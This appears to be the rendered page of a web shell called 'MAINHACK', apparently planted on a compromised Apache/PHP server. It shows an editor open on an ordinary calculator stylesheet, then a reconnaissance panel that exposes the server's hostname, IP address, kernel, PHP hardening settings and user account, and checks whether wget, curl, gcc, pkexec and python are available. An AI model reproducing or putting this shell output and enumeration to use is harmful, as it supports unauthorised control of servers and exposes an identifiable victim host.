[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: calculator.css
/* General modal styles */ .calculator-content { width: 320px; border-radius: 10px; background-color: #cfd8dc; box-shadow: 0px 4px 15px rgba(0, 0, 0, 0.2); } .modal-header { border-bottom: none; padding: 10px 20px; } .custom-modal-header { width: 20px; margin-left: auto; } .custom-modal-header:hover { background-color: inherit; } .close { font-size: 1.5rem; color: #333; } .container { padding: 1px; } #display { background-color: #eceff1; border: 1px solid #ddd; border-radius: 5px; font-size: 1.8rem; margin-bottom: 20px; width: 100%; } .button-row { margin-bottom: 10px; display: flex; justify-content: space-between; } .calculator-dialog { max-width: 320px; } .calculator-dialog .calculator-btn, .button-row .calculator-btn { background-color: #546e7a; border: 1px solid #546e7a; border-radius: 8px; color: #ffffff; cursor: pointer; font-size: 1rem; flex: 1; margin: 0 5px; transition: all 0.2s ease-in-out; } .button-row .calculator-btn { padding: 10px 20px; } .calculator-btn:hover { background-color: #f0f0f0; } .modal-body { padding: auto; } .calculator-btn:active { background-color: #ddd; transform: scale(0.95); } .operator-group { background-color: #546e7a; color: #ffffff; } .operator-group:hover { background-color: #546e7a; } .operand-group { background-color: #90a4ae; color: #ffffff; cursor: pointer; transition: box-shadow 0.3s ease; /* box-shadow: 0px 4px #90a4ae; */ } .operand-group:hover { background-color: #90a4ae; } #clear { background-color: #f44336; color: #ffffff; } #backspace { background-color: #ff9800; color: #ffffff; } #clear:hover { background-color: #f44336; } #equal { background-color: #4caf50; color: #ffffff; } #equal:hover { background-color: #4caf50; } @media (max-width: 576px) { #display { font-size: 1.5rem; padding: 10px; } .calculator-btn { font-size: 1rem; padding: 3px 15px; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002